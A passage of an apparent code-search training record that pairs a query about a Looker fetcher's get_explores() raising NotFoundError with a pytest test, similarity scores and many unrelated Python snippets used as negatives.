\t\t= int(long(exposure_id))\n\texposure_outcomes = DBHelper.exposure_outcome\n\toutcome_ids \t= DBHelper.exposure_outcome.get(e_id)\n\n\tsamples_rr \t= DBHelper.samples_rr.get(e_id)\n\tsamples_pop \t= DBHelper.samples_pop.get(e_id)\n\trisks \t\t= DBHelper.risks.get(e_id)\n\tmeasure \t= DBHelper.measures.get(e_id)\n\tdist_type \t= get_dist_type(e_id)\n\n\t#get population distribution \n\tpopDistribution = PopDistribution(DBHelper.age_group_num,non_rate,b_mean,b_sd,c_mean,c_sd,samples_pop,dist_type)\n\n\t#get outcomes\n\toutcomes = []\n\tfor o_id in outcome_ids:\n\t\t# mortality\n\t\tm_mortality = mortalities.get(2*o_id)\n\t\tf_mortality = mortalities.get(2*o_id+1)\n\t\t# risks\n\t\tm_risks = risks.get(2*o_id)\n\t\tf_risks = risks.get(2*o_id+1)\n\t\t# outcome name\n\t\tname = DBHelper.get_outcome_name(o_id)\n\t\t# limit estimates\n\t\tlle = DBHelper.exposure_outcome.get(e_id).get(o_id)[0]\n\t\tule = DBHelper.exposure_outcome.get(e_id).get(o_id)[1]\n\t\t# outcome\n\t\toutcome = PrimeOutcome(name,o_id,m_mortality,f_mortality,samples_rr,m_risks,f_risks,lle,ule,measure,e_id) \n\t\toutcomes.append(outcome)\n\n\texposure = PrimeExposure(mortalities,outcome_ids,samples_rr,samples_pop,outcomes,popDistribution)\n\treturn exposure" ]
[ "0.753411", "0.6666877", "0.6630365", "0.63271785", "0.6167889", "0.5833313", "0.55136293", "0.53865874", "0.53228235", "0.53056663", "0.5212486", "0.51720136", "0.51571435", "0.5055647", "0.50480455", "0.50150645", "0.49779034", "0.49160555", "0.49039322", "0.4895284", "0.4848704", "0.482605", "0.4824581", "0.48242378", "0.48210782", "0.48201323", "0.48130566", "0.4805133", "0.47655815", "0.47494656", "0.4748037", "0.47258034", "0.47196138", "0.4702308", "0.4702295", "0.46926677", "0.46888262", "0.46794218", "0.46759364", "0.46718252", "0.46692136", "0.46690103", "0.46681648", "0.46630797", "0.4658287", "0.46438962", "0.46365693", "0.46320397", "0.46316645", "0.4623911", "0.46210995", "0.46198216", "0.46181902", "0.46176514", "0.46171588", "0.4613754", "0.46083638", "0.46080238", "0.46070036", "0.4604151", "0.46038383", "0.46026015", "0.46025363", "0.4599809", "0.45964685", "0.45910552", "0.4580324", "0.4575527", "0.45733407", "0.45683867", "0.45666835", "0.4564399", "0.4561746", "0.45587906", "0.45431003", "0.45412165", "0.45402902", "0.453899", "0.45350116", "0.45307642", "0.45288593", "0.45278725", "0.45203403", "0.45135424", "0.4511145", "0.45065355", "0.4503953", "0.4498469", "0.4493937", "0.44903862", "0.44896066", "0.44882566", "0.44840655", "0.44787923", "0.4477653", "0.4473649", "0.4467357", "0.44672474", "0.4465248", "0.4462996" ]
0.822642
0
fetcher.get_explores() should throw if an explore/model is not found.
def test_get_explores_throws_if_model_or_explore_does_not_exist( fc: fetcher.Fetcher, model: Optional[str], explore: Optional[str], msg: str ): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_explores(model=model, explore=explore) assert msg in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def get_all_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_all()]", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def validate(self, mode: QueryMode = \"batch\") -> Dict[str, Any]:\n self._query_by_task_id = {}\n explore_count = self._count_explores()\n printer.print_header(\n f\"Testing {explore_count} \"\n f\"{'explore' if explore_count == 1 else 'explores'} \"\n f\"[{mode} mode] \"\n f\"[concurrency = {self.query_slots}]\"\n )\n\n self._create_and_run(mode)\n if mode == \"hybrid\" and self.project.errored:\n self._create_and_run(mode)\n\n for model in sorted(self.project.models, key=lambda x: x.name):\n for explore in sorted(model.explores, key=lambda x: x.name):\n 
message = f\"{model.name}.{explore.name}\"\n printer.print_validation_result(\n passed=not explore.errored, source=message\n )\n\n return self.project.get_results(mode)", "def fetch_gene_descriptions(self, metrics, coeff='cohen', nih_fetch_num=20, alpha=.05, **kwargs):\n if 'verbose' not in kwargs:\n kwargs['verbose'] = True\n if 'nih_dl' not in kwargs:\n kwargs['nih_dl'] = False\n\n if kwargs['nih_dl'] == False:\n if 'csv_path' not in kwargs:\n raise ValueError(\"'csv_path' argument in **kwargs missing; provide argument or use 'nih_dl':True .\")\n\n top_genes = []\n if coeff == 'cohen':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, list):\n raise ValueError(\"list passed with coeff='cohen'; if you want to use Spearman's Rho use coeff='spearman'.\")\n\n for rec in metrics['results'][:nih_fetch_num]:\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(rec.entrez))\n else:\n gene_dat = get_local_gene_info(kwargs['csv_path'], [rec.entrez])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((rec.entrez, rec.cohen_d, rec.p_value, gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha / float(metrics['gene_sample_size']))\n for eid, coh_d, p_val, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (p = %.3E; d = %.3f): < No description found >\\n\\n\" % (eid, p_val, coh_d)\n else:\n print \"%d (p = %.3E; d = %.3f): %s\\n\\n\" % (eid, p_val, coh_d, descr)\n elif coeff == 'spearman':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, dict):\n raise ValueError(\"dict passed with coeff='spearman'; if you want to use Cohen's d use coeff='cohen'.\")\n\n top_ids = np.argsort(metrics)[:nih_fetch_num]\n\n top_rs = [r for r in reversed(np.sort(metrics))][:nih_fetch_num]\n top_genes = []\n for x in xrange(len(top_ids)):\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(top_ids[x]))\n else:\n gene_dat = get_gene_info(kwargs['csv_path'], [top_ids[x]])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((int(top_ids[x]), top_rs[x], gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha/float(len(self.no.ge.keys())))\n for eid, rho, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (r = %.3f): < No description found >\\n\\n\" % (eid, rho)\n else:\n print \"%d (r = %.3f): %s\\n %s\\n\\n\" % (eid, rho, gene_i, descr)\n\n else:\n raise ValueError(\"Invalid parameter value for 'coeff'; use 'spearman' or 'cohen'.\")\n\n return top_genes", "def get(self, url_to_get=None): # pylint: disable=too-many-branches\n\n next_url = None\n if not url_to_get:\n url_to_get = self.url_to_get\n\n if self.etags and url_to_get in self.etags:\n self.headers[\"If-None-Match\"] = self.etags[url_to_get]\n\n req = get(url_to_get, headers=self.headers)\n\n if req.status_code == 200:\n data = req.json()\n repos = []\n\n if \"Etag\" in req.headers:\n self.etags[url_to_get] = req.headers[\"Etag\"]\n Helpers.Dict(self.etags).to_json(Settings.etags_file)\n\n if isinstance(data, list):\n repos.extend(data)\n else:\n raise Exception(\n \"Unable to understand GitHub API response for: '%s'.\" % url_to_get\n )\n\n if \"Link\" in req.headers:\n next_url = Helpers.Regex(\n req.headers[\"Link\"], self.regex_next_url, group=1, 
return_data=True\n ).match()\n\n if next_url:\n for element in self.get(url_to_get=next_url):\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n if repos:\n for element in repos:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n elif req.status_code == 304:\n data = Helpers.Dict.from_json(\n Helpers.File(Settings.repositories_file).read()\n )\n\n for element in data:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n elif req.status_code == 401:\n raise Exception(\"Bad GitHub credentials.\")\n else:\n raise Exception(\n \"Somethign went wrong while communicating with: '%s'.\" % url_to_get\n )", "def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def maybe_download():\n\n print(\"Downloading Inception 5h Model ...\")\n download.maybe_download_and_extract(url=data_url, download_dir=data_dir)", "def test_obtain_issues_no_query(self, mock_url_read):\n mock_url_read.side_effect = \\\n [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}', '<CxXMLResults />']\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_exploration_by_id(exploration_id, strict=True):\n exploration_memcache_key = _get_exploration_memcache_key(exploration_id)\n memcached_exploration = memcache_services.get_multi(\n [exploration_memcache_key]).get(exploration_memcache_key)\n\n if memcached_exploration is not None:\n return memcached_exploration\n else:\n exploration_model = exp_models.ExplorationModel.get(\n exploration_id, strict=strict)\n if exploration_model:\n exploration = exp_domain.Exploration(exploration_model)\n memcache_services.set_multi({\n exploration_memcache_key: exploration})\n return exploration\n else:\n return None", "async def get_model_evaluation(\n get_model_evaluation_request: DescriptionModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/get_model_evaluation endpoint\")\n logging.debug(f\"Request: {get_model_evaluation_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().get_model_evaluation_controller(\n request=get_model_evaluation_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/get_model_evaluation endpoint: {error}\")\n raise error", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n 
self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting models.\" in str(exc.value)", "def lookml_model_explore_with_http_info(self, lookml_model_name, explore_name, **kwargs):\n\n all_params = ['lookml_model_name', 'explore_name', 'fields']\n all_params.append('callback')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method lookml_model_explore\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'lookml_model_name' is set\n if ('lookml_model_name' not in params) or (params['lookml_model_name'] is None):\n raise ValueError(\"Missing the required parameter `lookml_model_name` when calling `lookml_model_explore`\")\n # verify the required parameter 'explore_name' is set\n if ('explore_name' not in params) or (params['explore_name'] is None):\n raise ValueError(\"Missing the required parameter `explore_name` when calling `lookml_model_explore`\")\n\n\n collection_formats = {}\n\n resource_path = '/lookml_models/{lookml_model_name}/explores/{explore_name}'.replace('{format}', 'json')\n path_params = {}\n if 'lookml_model_name' in params:\n path_params['lookml_model_name'] = params['lookml_model_name']\n if 'explore_name' in params:\n path_params['explore_name'] = params['explore_name']\n\n query_params = {}\n if 'fields' in params:\n query_params['fields'] = params['fields']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = []\n\n return self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LookmlModelExplore',\n auth_settings=auth_settings,\n callback=params.get('callback'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)", "def fetch_data():\n for category in CHEATSHEETS.items():\n subprocess.call(f'curl -o {PATH}{category[0] + \".csv\"} {category[1]}', shell=True)\n\n index = -1\n for filename in os.listdir(PATH):\n for idx, row in pd.read_csv(PATH 
+ filename, on_bad_lines='skip').replace(np.nan, '').iterrows():\n name = row['Model']\n url = REDIRECT_URL + name.lower()\n category = filename.split('.')[0]\n featurizers = row['Acceptable Featurizers'].split(' ') if row['Acceptable Featurizers'] != '' else []\n backends = ['PyTorch' if item in {\"PTorch\", \"Torch\", \"PyTorch \"} else item for item in row['Backend'].split('/')]\n types = row['Type'] if filename != 'general.csv' else row['Classifier/Regressor']\n types = types.split('/') if filename == 'material.csv' else types.split('/ ')\n index += 1\n\n backend_list.append(backends)\n type_list.append(types)\n featurizer_list.append(featurizers)\n model_list.append(Model(name, url, category, featurizers, backends, types, index))", "def get_viewable_explorations(user_id):\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_viewable_explorations(user_id)]", "def unfound_entities(token, path='', file='result.csv', save=False, chunk_size=128):\n\n headers = {\n 'accept': 'text/csv',\n }\n\n try:\n response = requests.get(\n 'https://reactome.org/AnalysisService/download/%s/entities/notfound/%s' % (token, file),\n headers=headers)\n except ConnectionError as e:\n print(e)\n\n if response.status_code == 200:\n if save:\n with open(\"\".join([path, file]), 'wb') as f:\n for chunk in response.iter_content(chunk_size=chunk_size):\n f.write(chunk)\n else:\n gene_list = response.text.split('\\n')\n df_list = [row.split(\",\") for row in gene_list[:-1]]\n df = pandas.DataFrame(df_list)\n df = df.iloc[1:]\n return df\n else:\n print('Status code returned a value of %s' % response.status_code)", "def test_fetch_no_results():\n url = (\n \"https://gliders.ioos.us/erddap/search/index.csv?page=1&itemsPerPage=100000&searchFor\"\n '=\"incredibly_long_string_that_should_never_match_a_real_dataset\" '\n )\n key = \"ioos\"\n data = fetch_results(url, key)\n assert data is None", "def get_public_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_public_explorations()]", "def _fetch(self):\n self._data = self._get(self.url)\n\n if self._data['released_errata'] is not None:\n self._released_errata = Erratum(errata_id=self._data[\n 'released_errata']['id'])\n\n for errata_dict in self._data['all_errata']:\n errata = Erratum(errata_id=errata_dict['id'])\n self._all_errata.append(errata)\n\n self._signed_rpms = self._data.get('rpms_signed')\n\n for et_file in self._data['files']:\n self._files.append(et_file['path'])", "def fetch_object(url):\n print(' GET ' + url)\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=15)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n r = session.get(url)\n # Covering internal server errors by retrying one more time\n if r.status_code == 500:\n time.sleep(5)\n r = requests.get(url, allow_redirects=True)\n elif r.status_code != 200:\n print(f\"Problem with request: {str(r)}\")\n raise RuntimeError(\"Non-200 status code\")\n return r", "def explores(self, explores):\n\n self._explores = explores", "def get(self, request):\n city_code = request.GET.get(\"city_code\", \"6624397033787067229\")\n checkin_date = request.GET.get(\"checkin_date\", \"20191026\")\n checkout_date = request.GET.get(\"checkout_date\", \"20191027\")\n url = \"https://hermes.goibibo.com/hotels/v9/search/data/v3/\" + city_code + \"/\" + checkin_date + \"/\" \\\n + checkout_date + \"/1-2-0\"\n\n params = {\n \"s\": \"popularity\",\n \"cur\": \"INR\",\n 
\"f\": \"{}\",\n \"sb\": \"0\",\n \"ud\": \"\",\n \"ai\": \"1\",\n \"asi\": \"0\",\n \"st\": \"voy\",\n \"vt\": \"city\",\n \"eid\": city_code,\n \"pid\": \"0\",\n \"im\": \"true\"\n }\n response = requests.get(url, params=params)\n resp = []\n if response.status_code == 200:\n response_data = response.json().get(\"data\", [])\n for obj in response_data:\n data_dict = {\n \"hotel_name\": obj.get(\"hn\", \"\"),\n \"star_rating\": obj.get(\"gr\", \"\"),\n \"image_url\": obj.get(\"t\", \"\"),\n \"price\": obj.get(\"opr\", \"\"),\n \"rating_count\": obj.get(\"grc\", \"\"),\n \"badge\": obj.get(\"bt\", \"\"),\n \"location\": obj.get(\"l\", \"\"),\n \"info\": obj.get(\"ut\", \"\")\n }\n resp.append(data_dict)\n return Response(resp)", "def fetch_from_url(request, url):\n\n err = None\n article = None\n path = None\n \n url_path = get_url_path(url)\n\n try:\n root = Article.get_root()\n except:\n err = not_found(request, '')\n return (article, path, err)\n\n if url_path and root.slug == url_path[0]:\n url_path = url_path[1:]\n\n path = Article.get_url_reverse(url_path, root)\n if not path:\n err = not_found(request, '/' + '/'.join(url_path))\n else:\n article = path[-1]\n return (article, path, err)", "def _get_one(self,url):\n pass", "def fetch_issue(repo, issue, issues_url, caching=CACHING_ACTIVE):\n if not caching:\n data = requests.get(issues_url + \"/{}\".format(issue)).json()\n if not response_check(data):\n return {}\n return data\n else:\n cached = get_cached_issue(repo, issue)\n if not cached:\n debug('cache miss issue', yellow)\n data = requests.get(issues_url + \"/{}\".format(issue)).json()\n if not response_check(data):\n return {}\n cache_issue(repo, issue, data)\n return data\n else:\n debug('Cache hit issue', green)\n return cached", "def get_exp(exp_file=None, exp_name=None):\n assert (\n exp_file is not None or exp_name is not None\n ), \"plz provide exp file or exp name.\"\n if exp_file is not None:\n return get_exp_by_file(exp_file)\n else:\n return get_exp_by_name(exp_name)", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def fetch(prom_url, query_expr):\n\n global scrape_timestamp\n scrape_timestamp = int(datetime.now(tz=timezone.utc).timestamp() * 1000)\n\n response = requests.get(prom_url, params={ 'query': query_expr })\n results = response.json()['data']['result']\n\n return results", "def get(ctx, job):\n\n def get_experiment():\n try:\n response = PolyaxonClient().experiment.get_experiment(user, project_name, _experiment)\n cache.cache(config_manager=ExperimentManager, response=response)\n except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:\n Printer.print_error('Could not load experiment `{}` info.'.format(_experiment))\n Printer.print_error('Error message `{}`.'.format(e))\n sys.exit(1)\n\n get_experiment_details(response)\n\n def get_experiment_job():\n try:\n response = PolyaxonClient().experiment_job.get_job(user,\n project_name,\n _experiment,\n _job)\n cache.cache(config_manager=ExperimentJobManager, response=response)\n except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:\n Printer.print_error('Could not get job `{}`.'.format(_job))\n Printer.print_error('Error 
message `{}`.'.format(e))\n sys.exit(1)\n\n if response.resources:\n get_resources(response.resources.to_dict(), header=\"Job resources:\")\n\n response = Printer.add_status_color(response.to_light_dict(\n humanize_values=True,\n exclude_attrs=['uuid', 'definition', 'experiment', 'unique_name', 'resources']\n ))\n Printer.print_header(\"Job info:\")\n dict_tabulate(response)\n\n user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),\n ctx.obj.get('experiment'))\n\n if job:\n _job = get_experiment_job_or_local(job)\n get_experiment_job()\n else:\n get_experiment()", "def view_experiment(request,id):\n\texp = Experiment.objects.get(id=id)\n\tpossibly_related = get_related(exp)\n\treturn list_detail.object_detail(request,\n\t\t\t\t\t\t\t\t\tqueryset=Experiment.objects.filter(id=id),\n\t\t\t\t\t\t\t\t\tobject_id=exp.id,\n\t\t\t\t\t\t\t\t\ttemplate_name='experiments/experiment.html',\n\t\t\t\t\t\t\t\t\textra_context= {\"possibly_related\" : possibly_related})", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def sel_exp_query(\n experiment_name,\n model,\n # db_config,\n credentials,\n cluster=False):\n perfs = None\n proc_model_name = '%%/%s' % model\n with allen_db(\n # config=db_config,\n cluster=cluster,\n credentials=credentials) as db_conn:\n perfs = db_conn.get_performance_by_model(\n experiment_name=experiment_name,\n model=proc_model_name)\n return perfs", "def found_entities(token, path='', resource='TOTAL', file='result.csv', save=False, chunk_size=128):\n\n headers = {\n 'accept': 'text/csv',\n }\n\n try:\n response = requests.get(\n 'https://reactome.org/AnalysisService/download/%s/entities/found/%s/%s' % (token, resource, file),\n headers=headers)\n except ConnectionError as e:\n print(e)\n\n if response.status_code == 200:\n if save:\n with open(\"\".join([path, file]), 'wb') as f:\n for chunk in response.iter_content(chunk_size=chunk_size):\n f.write(chunk)\n else:\n gene_list = response.text.split('\\n')\n df_list = [row.split(\",\") for row in gene_list[:-1]]\n df = pandas.DataFrame(df_list)\n df = df.iloc[1:]\n return df\n else:\n print('Status code returned a value of %s' % response.status_code)", "def test_GET_fetcher_fail():\n bad_url = GET_ECHO_ENDPOINT.replace('.com', '.comx')\n\n with pytest.raises(Exception): #TODO: specific exception?\n resp = wf_utils.fetch_GET_request(bad_url)\n\n #TODO: bad status code tests?", "def assert_fetch_raises(self, view_name, args=None, kwargs=None):\n with self.assertRaises(ImproperlyConfigured):\n response_from_view(view_name, args=args, kwargs=kwargs)", "def test_codigo_exp(self):\n response = self.client.get('/apirest/expedientes/?codigoExp=0019-JGM-2014')\n self.assertEqual(response.status_code, self.CODIGO_EXITO)\n self.assertEqual(response.data[\"count\"], 1)\n self.assertEqual(response.data[\"results\"][0][\"tipocamara\"], self.TIPO_CAMARA)\n self.assertEqual(response.data[\"results\"][0][\"voces\"], self.RANGO_FECHAS_VOCES)", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def 
get_all_images(access_token):\n url = 'http://interview.agileengine.com/images'\n headers = {\n 'Authorization': 'Bearer ' + access_token\n }\n images = []\n try:\n logging.info(\"Fetching all the images\")\n response = requests.get(\n url,\n headers=headers\n )\n if response.ok: \n total_pages = response.json().get('pageCount')\n images = response.json().get('pictures')\n logging.info(f\"fetched 1 of {total_pages}\")\n for i in range(2,total_pages + 1):\n paginated_url = f'http://interview.agileengine.com/images?page={i}'\n response = requests.get(\n paginated_url,\n headers=headers\n )\n images += response.json().get('pictures')\n logging.info(f\"fetched {i} of {total_pages}\")\n \n detailed_images = []\n for image in images:\n detail_url = f\"http://interview.agileengine.com/images/{image.get('id')}\"\n \n logging.info(f\"Retrieving detail of {image['id']}\")\n response = requests.get(\n detail_url,\n headers=headers\n )\n if response.ok:\n detailed_images.append(response.json())\n return detailed_images\n except requests.exceptions.HTTPError:\n logging.exception('HTTP error')\n except requests.exceptions.ConnectionError:\n logging.exception('Connection error')\n except requests.exceptions.Timeout:\n logging.exception('Timeout error')\n except requests.exceptions.RequestException as e:\n logging.exception('Unexpected error')", "def test_get_issues_no_hydrator():\n app = CometApi().create_app()\n with app.app_context():\n client = app.test_client()\n assert client.get(\"/v0/issues\")", "def test_impact_for_exp_with_no_ratings(self):\n # Sign up a user and have them create an exploration.\n user_a_id = self._sign_up_user(\n self.USER_A_EMAIL, self.USER_A_USERNAME)\n self._create_exploration(self.EXP_ID_1, user_a_id)\n user_stats_model = user_models.UserStatsModel.get(\n user_a_id, strict=False)\n self.assertEqual(user_stats_model, None)", "def _try_extractors(environ, extractors, start_response):\n for extractor_name in extractors:\n try:\n imported_module = __import__('tiddlyweb.web.extractors.%s' %\n extractor_name, {}, {}, ['Extractor'])\n except ImportError:\n try:\n imported_module = __import__(extractor_name, {}, {},\n ['Extractor'])\n except ImportError, exc:\n raise ImportError('could not load extractor %s: %s' %\n (extractor_name, exc))\n extractor = imported_module.Extractor()\n extracted_user = extractor.extract(environ, start_response)\n if extracted_user:\n logging.debug('UserExtract:%s found %s',\n extractor_name, extracted_user)\n return extracted_user\n return False", "def get_experiment_parser(opts):\n\n user, passwd = auth.get_user_credentials(opts.username, opts.password)\n api = rest.Api(user, passwd)\n\n if opts.get_cmd == 'experiment_list':\n return experiment.get_experiments_list(api, opts.state, opts.limit,\n opts.offset)\n else:\n exp_id = helpers.get_current_experiment(api, opts.experiment_id)\n return experiment.get_experiment(api, exp_id, opts.get_cmd)", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def test_get_object_not_found(self, employee_model):\n employee_model.DoesNotExist = Employee.DoesNotExist\n employee_model.objects.get.side_effect = employee_model.DoesNotExist\n\n with self.assertRaises(Http404):\n self.view.get_object(1)", "def explore_view(request):\r\n # explore items\r\n user = request.user.userprofile\r\n items = Item.objects.explore(user)\r\n context = {'items':items}\r\n return render(request, 'explore/explore.html', context)", "def list(self, request):\n exp = Experiment.objects.all()\n serializer = 
ExperimentSerializer(exp, many=True)\n return send_response(request.method, serializer)", "def __getitem__(self, type: str):\n nodes = pandas.read_csv(join(self.base_path, \"nodes.csv\"))\n edges = pandas.read_csv(join(self.base_path, \"held.csv\"))\n if type == \"link\":\n # nodes = pandas.read_csv(join(self.base_path, \"nodes.csv\"))\n held = pandas.read_csv(join(self.base_path, \"held.csv\"))\n\n held = held.query('type == 8')[['src', 'dst']]\n\n # node_pool = set(self.splits[2])\n # held = keep_from_set(held, node_pool)\n\n return Experiment(self.embed, nodes, edges, held, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\", compact_dst=False)\n\n elif type == \"apicall\":\n api_seq = pandas.read_csv(self.experiments['apicall'])\n\n # unique_nodes = set(nodes['id'].values.tolist())\n\n # api_seq_test = api_seq.copy()\n # api_seq_test['src'] = api_seq_test['src'].apply(lambda nid: nid if nid in unique_nodes else None)\n # api_seq_test['dst'] = api_seq_test['dst'].apply(lambda nid: nid if nid in unique_nodes else None)\n # api_seq_test.dropna(axis=0, inplace=True)\n\n # disabled for testing\n # api_seq = api_seq[\n # api_seq['src'].apply(lambda nid: nid in unique_nodes)\n # ]\n #\n # 